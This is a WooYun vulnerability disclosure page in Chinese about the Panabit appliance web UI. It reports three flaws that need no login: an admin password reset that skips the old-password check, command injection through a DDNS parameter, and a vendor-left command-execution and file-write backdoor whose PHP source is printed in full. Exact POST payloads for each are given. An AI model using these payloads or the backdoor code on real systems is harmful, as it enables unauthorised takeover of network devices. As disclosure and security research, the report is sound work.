当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(31) 关注此漏洞

缺陷编号: WooYun-2015-114137

漏洞标题: panabit高危漏洞合集(官方后门、直接改admin密码以及系统命令执行)

相关厂商: 北京派网软件有限公司

漏洞作者: f4ckbaidu

提交时间: 2015-05-16 17:50

公开时间: 2015-08-16 14:36

漏洞类型: 远程代码执行

危害等级: 高

自评Rank: 20

漏洞状态: 已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 官方后门 系统命令执行

10人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-16: 细节已通知厂商并且等待厂商处理中
2015-05-18: 厂商已经确认,细节仅向厂商公开
2015-05-21: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2015-07-12: 细节向核心白帽子及相关领域专家公开
2015-07-22: 细节向普通白帽子公开
2015-08-01: 细节向实习白帽子公开
2015-08-16: 细节向公众公开

简要描述:

新版UI的问题,开发真是日了狗了

详细说明:

测试版本:

1.png



所有漏洞利用起来都不需要登陆哦,详情参考下面描述:



0x01 无需登录就可配置系统

很多功能不需要登陆就可以使用,更改流控配置,我就以修改密码为例

看下修改密码的逻辑功能代码,直接无语:

(/usr/ramdisk/www/sys/maintain/system_handle.php)

code 区域
if ($type == "changepass_handle") {


        $oldpass = postval("oldpass");


        $newpass = postval("newpass");


        $loginuser = postval("loginuser");





        exec("cat /etc/.htpasswd2 | grep $loginuser:$oldpass", $out, $ret);


        if ($out[0] == "") {


                outputres("no", "");


                exit;


        }


<修改密码逻辑>



不判断$oldpass是否为空,屌渣天的程序猿

不需要知道旧密码,直接POST “type=changepass_handle&loginuser=admin&newpass=123”就可以把admin密码改了

并且http://IP/sys/Maintain/system_handle.php这个页面不需要登陆就可以访问,不信你试试

2.png





0x02 系统命令注入

还是/usr/ramdisk/www/sys/maintain/system_handle.php:

code 区域
if ($type == "ddns_config_handle") {


        $ddns_enable = postval("ddns_enable");





        $cmd = $ipe_ddns." -e $ddns_enable";


        exec($cmd, $out, $ret);


        if ($ret != "0") {


                outputres("no", $out[0]);


                exit;


        }





        outputres("yes", "");


}



这个没什么好说的

POST http://IP/sys/Maintain/system_handle.php

code 区域
type=ddns_config_handle&ddns_enable=0|id>/tmp/fuck.txt



web根目录/usr/ramdisk不可写,所以写在/tmp/目录下测试

3.png



好多php都用了exec函数,一个一个改吧

code 区域
panaos#find /usr/ramdisk/www/ -name "*.php" | xargs grep -E "exec" | awk -F ":" '{print $1}' | sort -u


/usr/ramdisk/www/app/conlimit/php/app_node.php


/usr/ramdisk/www/app/conlimit/php/app_position.php


/usr/ramdisk/www/app/conlimit/php/appview_data.php


/usr/ramdisk/www/app/conlimit/php/appview_policy.php


/usr/ramdisk/www/app/conlimit/php/bps_dump.php


/usr/ramdisk/www/app/conlimit/php/common.php


/usr/ramdisk/www/app/conlimit/php/conlimit.php


/usr/ramdisk/www/app/conlimit/php/conlimit_addrule.php


/usr/ramdisk/www/app/conlimit/php/conlimit_editrule.php


/usr/ramdisk/www/app/conlimit/php/getapp.php


/usr/ramdisk/www/app/conlimit/php/grpview.php


/usr/ramdisk/www/app/conlimit/php/ipgrp.php


/usr/ramdisk/www/app/conlimit/php/lan_handle.php


/usr/ramdisk/www/app/conlimit/php/policy_conlimit.php


/usr/ramdisk/www/app/conlimit/php/policy_listtime.php


/usr/ramdisk/www/app/conlimit/php/policy_time_add.php


/usr/ramdisk/www/app/conlimit/php/policy_time_edit.php


/usr/ramdisk/www/app/conlimit/php/show_appinfo.php


/usr/ramdisk/www/app/ixcache/php/common.php


/usr/ramdisk/www/app/ixcache/php/ixcache_config.php


/usr/ramdisk/www/app/ixcache/php/ixcache_handle.php


/usr/ramdisk/www/app/mac/php/common.php


/usr/ramdisk/www/app/mac/php/downloadconf.php


/usr/ramdisk/www/app/mac/php/ipgrp.php


/usr/ramdisk/www/app/mac/php/mac_config.php


/usr/ramdisk/www/app/mac/php/mac_handle.php


/usr/ramdisk/www/app/urlfilter/php/common.php


/usr/ramdisk/www/app/urlfilter/php/ipgrp.php


/usr/ramdisk/www/app/urlfilter/php/policy_listtime.php


/usr/ramdisk/www/app/urlfilter/php/policy_time_add.php


/usr/ramdisk/www/app/urlfilter/php/policy_time_edit.php


/usr/ramdisk/www/app/urlfilter/php/policy_urlfilter.php


/usr/ramdisk/www/app/urlfilter/php/urldnsgrp.php


/usr/ramdisk/www/app/urlfilter/php/urlext.php


/usr/ramdisk/www/app/urlfilter/php/urlfilter_addrule.php


/usr/ramdisk/www/app/urlfilter/php/urlfilter_editrule.php


/usr/ramdisk/www/app/urlfilter/php/urlfilteraddrule.php


/usr/ramdisk/www/app/webauth/php/auth_config.php


/usr/ramdisk/www/app/webauth/php/common.php


/usr/ramdisk/www/app/webauth/php/downloadconf.php


/usr/ramdisk/www/app/webauth/php/ipgrp.php


/usr/ramdisk/www/app/webauth/php/webauth.php


/usr/ramdisk/www/app/webauth/php/webauth_handle.php


/usr/ramdisk/www/sys/app_position.php


/usr/ramdisk/www/sys/common.php


/usr/ramdisk/www/sys/downloadconf.php


/usr/ramdisk/www/sys/login/login_handle.php


/usr/ramdisk/www/sys/maintain/alert.php


/usr/ramdisk/www/sys/maintain/config_syn.php


/usr/ramdisk/www/sys/maintain/datalog.php


/usr/ramdisk/www/sys/maintain/ddns_add.php


/usr/ramdisk/www/sys/maintain/ddns_config.php


/usr/ramdisk/www/sys/maintain/ddns_edit.php


/usr/ramdisk/www/sys/maintain/device_set.php


/usr/ramdisk/www/sys/maintain/dhcp.php


/usr/ramdisk/www/sys/maintain/hdlevtconfig.php


/usr/ramdisk/www/sys/maintain/ifspeed.php


/usr/ramdisk/www/sys/maintain/ifspeed_set.php


/usr/ramdisk/www/sys/maintain/ip_summary.php


/usr/ramdisk/www/sys/maintain/ipstat_config_html.php


/usr/ramdisk/www/sys/maintain/ipstat_hdl.php


/usr/ramdisk/www/sys/maintain/license_info.php


/usr/ramdisk/www/sys/maintain/license_upgrade_hdl.php


/usr/ramdisk/www/sys/maintain/session.php


/usr/ramdisk/www/sys/maintain/share_config.php


/usr/ramdisk/www/sys/maintain/sys_clearlog.php


/usr/ramdisk/www/sys/maintain/system_handle.php


/usr/ramdisk/www/sys/maintain/system_info.php


/usr/ramdisk/www/sys/maintain/system_upgrade.php


/usr/ramdisk/www/sys/maintain/tos.php


/usr/ramdisk/www/sys/maintain/tos_config_html.php


/usr/ramdisk/www/sys/maintain/tos_hdl.php


/usr/ramdisk/www/sys/maintain/url.php


/usr/ramdisk/www/sys/monitor/app_detail.php


/usr/ramdisk/www/sys/monitor/app_node.php


/usr/ramdisk/www/sys/monitor/app_topn.php


/usr/ramdisk/www/sys/monitor/appgroup_html.php


/usr/ramdisk/www/sys/monitor/appgroup_stacking.php


/usr/ramdisk/www/sys/monitor/appview_data.php


/usr/ramdisk/www/sys/monitor/appview_policy.php


/usr/ramdisk/www/sys/monitor/bps_3dayupdn.php


/usr/ramdisk/www/sys/monitor/bps_dump.php


/usr/ramdisk/www/sys/monitor/bps_updown.php


/usr/ramdisk/www/sys/monitor/bpscur.php


/usr/ramdisk/www/sys/monitor/cpu.php


/usr/ramdisk/www/sys/monitor/curr_bps_dump.php


/usr/ramdisk/www/sys/monitor/currbpspoint.php


/usr/ramdisk/www/sys/monitor/flow_rate.php


/usr/ramdisk/www/sys/monitor/flowcur.php


/usr/ramdisk/www/sys/monitor/getapp.php


/usr/ramdisk/www/sys/monitor/group_pie.php


/usr/ramdisk/www/sys/monitor/group_stack.php


/usr/ramdisk/www/sys/monitor/grpview.php


/usr/ramdisk/www/sys/monitor/history_iptrend.php


/usr/ramdisk/www/sys/monitor/if_handle.php


/usr/ramdisk/www/sys/monitor/info_system.php


/usr/ramdisk/www/sys/monitor/ip_summary.php


/usr/ramdisk/www/sys/monitor/ip_topn.php


/usr/ramdisk/www/sys/monitor/ip_trend_cur.php


/usr/ramdisk/www/sys/monitor/ipview_account.php


/usr/ramdisk/www/sys/monitor/ipview_data.php


/usr/ramdisk/www/sys/monitor/ipview_flow.php


/usr/ramdisk/www/sys/monitor/ipview_lip.php


/usr/ramdisk/www/sys/monitor/ipview_mobile.php


/usr/ramdisk/www/sys/monitor/ipview_userinfo.php


/usr/ramdisk/www/sys/monitor/mobstat.php


/usr/ramdisk/www/sys/monitor/policy_setlink_hldold.php


/usr/ramdisk/www/sys/monitor/proxy_chart_trend.php


/usr/ramdisk/www/sys/monitor/proxy_detail.php


/usr/ramdisk/www/sys/monitor/proxy_grp.php


/usr/ramdisk/www/sys/monitor/proxy_show.php


/usr/ramdisk/www/sys/monitor/proxy_stat.php


/usr/ramdisk/www/sys/monitor/show_appinfo.php


/usr/ramdisk/www/sys/monitor/summary.php


/usr/ramdisk/www/sys/monitor/usercur.php


/usr/ramdisk/www/sys/monitor/usrgrp_view.php


/usr/ramdisk/www/sys/monitor/vlink.php


/usr/ramdisk/www/sys/monitor/vlink_add.php


/usr/ramdisk/www/sys/monitor/vlink_edit.php


/usr/ramdisk/www/sys/myapp/auth_config.php


/usr/ramdisk/www/sys/myapp/mac_config.php


/usr/ramdisk/www/sys/myapp/mac_handle.php


/usr/ramdisk/www/sys/myapp/myapp_handle.php


/usr/ramdisk/www/sys/myapp/webauth.php


/usr/ramdisk/www/sys/myapp/webauth_handle.php


/usr/ramdisk/www/sys/pppoe/account_import_output.php


/usr/ramdisk/www/sys/pppoe/account_pool_change.php


/usr/ramdisk/www/sys/pppoe/ippool_adduser.php


/usr/ramdisk/www/sys/pppoe/ippool_edit.php


/usr/ramdisk/www/sys/pppoe/ippool_edituser.php


/usr/ramdisk/www/sys/pppoe/l2bypass_account.php


/usr/ramdisk/www/sys/pppoe/l2bypass_addacc.php


/usr/ramdisk/www/sys/pppoe/l2bypass_config.php


/usr/ramdisk/www/sys/pppoe/l2bypass_config_html.php


/usr/ramdisk/www/sys/pppoe/notify_msg.php


/usr/ramdisk/www/sys/pppoe/pppoe_account.php


/usr/ramdisk/www/sys/pppoe/pppoe_addsvr.php


/usr/ramdisk/www/sys/pppoe/pppoe_config.php


/usr/ramdisk/www/sys/pppoe/pppoe_editsvr.php


/usr/ramdisk/www/sys/pppoe/pppoe_handle.php


/usr/ramdisk/www/sys/pppoe/pppoe_online.php


/usr/ramdisk/www/sys/protocol/app_seek.php


/usr/ramdisk/www/sys/protocol/appgroup.php


/usr/ramdisk/www/sys/protocol/getsons.php


/usr/ramdisk/www/sys/protocol/ipprotect.php


/usr/ramdisk/www/sys/protocol/pro_config.php


/usr/ramdisk/www/sys/protocol/pro_handle.php


/usr/ramdisk/www/sys/protocol/seekparent.php


/usr/ramdisk/www/sys/route/dns_addrule.php


/usr/ramdisk/www/sys/route/dns_editrule.php


/usr/ramdisk/www/sys/route/lan_add.php


/usr/ramdisk/www/sys/route/lan_edit.php


/usr/ramdisk/www/sys/route/lan_handle.php


/usr/ramdisk/www/sys/route/policy_addrule.php


/usr/ramdisk/www/sys/route/policy_editrule.php


/usr/ramdisk/www/sys/route/portmap_add.php


/usr/ramdisk/www/sys/route/portmap_edit.php


/usr/ramdisk/www/sys/route/proxy_export.php


/usr/ramdisk/www/sys/route/proxy_import.php


/usr/ramdisk/www/sys/route/wan_add.php


/usr/ramdisk/www/sys/route/wan_edit.php


/usr/ramdisk/www/sys/setup/apptype.php


/usr/ramdisk/www/sys/setup/conlimit.php


/usr/ramdisk/www/sys/setup/conlimit_addrule.php


/usr/ramdisk/www/sys/setup/conlimit_editrule.php


/usr/ramdisk/www/sys/setup/flow.php


/usr/ramdisk/www/sys/setup/ipgrp.php


/usr/ramdisk/www/sys/setup/ipgrploadfile.php


/usr/ramdisk/www/sys/setup/listtime.php


/usr/ramdisk/www/sys/setup/pipe.php


/usr/ramdisk/www/sys/setup/pipeinfo.php


/usr/ramdisk/www/sys/setup/pipepriority.php


/usr/ramdisk/www/sys/setup/policy_addrule.php


/usr/ramdisk/www/sys/setup/policy_conlimit.php


/usr/ramdisk/www/sys/setup/policy_editrule.php


/usr/ramdisk/www/sys/setup/policy_flow.php


/usr/ramdisk/www/sys/setup/policy_head.php


/usr/ramdisk/www/sys/setup/policy_link.php


/usr/ramdisk/www/sys/setup/policy_listtime.php


/usr/ramdisk/www/sys/setup/policy_setlink.php


/usr/ramdisk/www/sys/setup/policy_stat.php


/usr/ramdisk/www/sys/setup/policy_time_add.php


/usr/ramdisk/www/sys/setup/policy_time_edit.php


/usr/ramdisk/www/sys/setup/policy_urlfilter.php


/usr/ramdisk/www/sys/setup/policygroup.php


/usr/ramdisk/www/sys/setup/proxy.php


/usr/ramdisk/www/sys/setup/rule.php


/usr/ramdisk/www/sys/setup/setpriority.php


/usr/ramdisk/www/sys/setup/share_config.php


/usr/ramdisk/www/sys/setup/tree.php


/usr/ramdisk/www/sys/setup/urldnsgrp.php


/usr/ramdisk/www/sys/setup/urlext.php


/usr/ramdisk/www/sys/setup/urlfilter_addrule.php


/usr/ramdisk/www/sys/setup/urlfilter_editrule.php


/usr/ramdisk/www/sys/setup/urlfilteraddrule.php


/usr/ramdisk/www/sys/setup/usragpiframeold2.php


/usr/ramdisk/www/sys/setup/usrgrp.php


/usr/ramdisk/www/sys/sysrun.php


/usr/ramdisk/www/sys/tendency/app_seek.php


/usr/ramdisk/www/sys/tendency/setlink.php


/usr/ramdisk/www/sys/tendency/tengency.php


/usr/ramdisk/www/sys/top.php


/usr/ramdisk/www/sys/version.php





0x03 官方后门

code 区域
panaos#cat /usr/ramdisk/www/sys/cmdhandle.php 


<?php


$doc = $_SERVER['DOCUMENT_ROOT'];


$cmd = $_POST["cmd"];


$type = $_POST['type'];





if ($type == "get"){


	$ds = explode(' ', $cmd);


		


	$fp = popen($cmd, "r");


	if (!$fp){


		echo "命令执行失败";


		exit(0);


	}





	if (is_file($ds[1]) && !file_exists($ds[1])){


		echo "file no found\n";


		exit(0);


	}


	$str = "";


	while(! feof($fp)){


		$s = htmlspecialchars(fgets($fp));


		$s = str_replace("\n", "<br/>", $s);


		if ($s == "\n") continue;


		$str .= " ".$s;


	}


	echo iconv("gb2312", "utf-8", $str);


	exit(0);


}





if ($type == "viget"){


    $ds = explode(' ', $cmd);





    $fp = popen($cmd, "r");


    if (!$fp){


        echo "命令执行失败";


        exit(0);


    }





    if (is_file($ds[1]) && !file_exists($ds[1])){


        echo "file no found\n";


        exit(0);


    }


    $str = "";


    while(! feof($fp)){


        $s = (fgets($fp));


        if ($s == "\n") continue;


        $str .= $s;


    }


    echo iconv("gb2312", "utf-8", $str);


    exit(0);


}





if ($type == "save"){


    $con = urldecode($_POST['con']);


	


	if (!is_file($cmd)){


		echo "该文件不可编辑";


		exit(0);


	}


	


	$fp = fopen($cmd, "w");


	if (!$fp){


		echo "打开文件失败";


		exit(0);


	}


	fwrite($fp, $con);


	fclose($fp);


	echo "操作成功";


}



这个也没什么好说的,官方自己留的命令执行、文件读写后门,以命令执行为例:

4.png

漏洞证明:

2.png



3.png



4.png

修复方案:

u know

版权声明:转载请注明来源 f4ckbaidu@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-05-18 14:34

厂商回复:

CNVD未直接所述漏洞情况,暂未建立与软件生产厂商的直接处置渠道,待认领。

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

  1. 2015-05-14 17:57 | f4ck ( 实习白帽子 | Rank:42 漏洞数:7 | 有些人很牛B,一个漏洞能刷成N个。)
    0

    这个叼,panabit用的企业还真不少。

    1# 回复此人
  2. 2015-05-14 17:58 | PgHook ( 普通白帽子 | Rank:1020 漏洞数:123 | Portulaca grandiflora Hook.)
    0

    这个还是挺屌的。

    2# 回复此人
  3. 2015-05-20 10:11 | wefgod ( 核心白帽子 | Rank:1825 漏洞数:183 | 力不从心)
    0

    @f4ck 来看看,你们一家人吗

    3# 回复此人
  4. 2015-05-20 10:25 | f4ck ( 实习白帽子 | Rank:42 漏洞数:7 | 有些人很牛B,一个漏洞能刷成N个。)
    0

    @wefgod 我来看我大表哥。

    4# 回复此人
  5. 2015-05-21 17:33 | 真旅网集团(乌云厂商)
    0

    这个就不应该放出去,直接限制到内网~

    5# 回复此人
  6. 2015-05-21 20:02 | f4ckbaidu ( 普通白帽子 | Rank:243 漏洞数:32 | 开发真是日了狗了)
    0

    @真旅网集团 好多小企业、网吧在用,他们的安全意识,你懂的

    6# 回复此人
  7. 2015-07-27 15:21 | f4ckbaidu ( 普通白帽子 | Rank:243 漏洞数:32 | 开发真是日了狗了)
    0

    这个木有$?

    7# 回复此人
  8. 2015-07-31 11:39 | f4ckbaidu ( 普通白帽子 | Rank:243 漏洞数:32 | 开发真是日了狗了)
    0

    @疯狗

    8# 回复此人
  9. 2015-09-29 11:10 | 名字xsser ( 路人 | Rank:5 漏洞数:1 | 顺流而下,把梦做完|最近小忙,有问题可以...)
    0

    第一处改密码那难道不就是个命令注入吗??

    9# 回复此人

登录后才能发表评论,请先 登录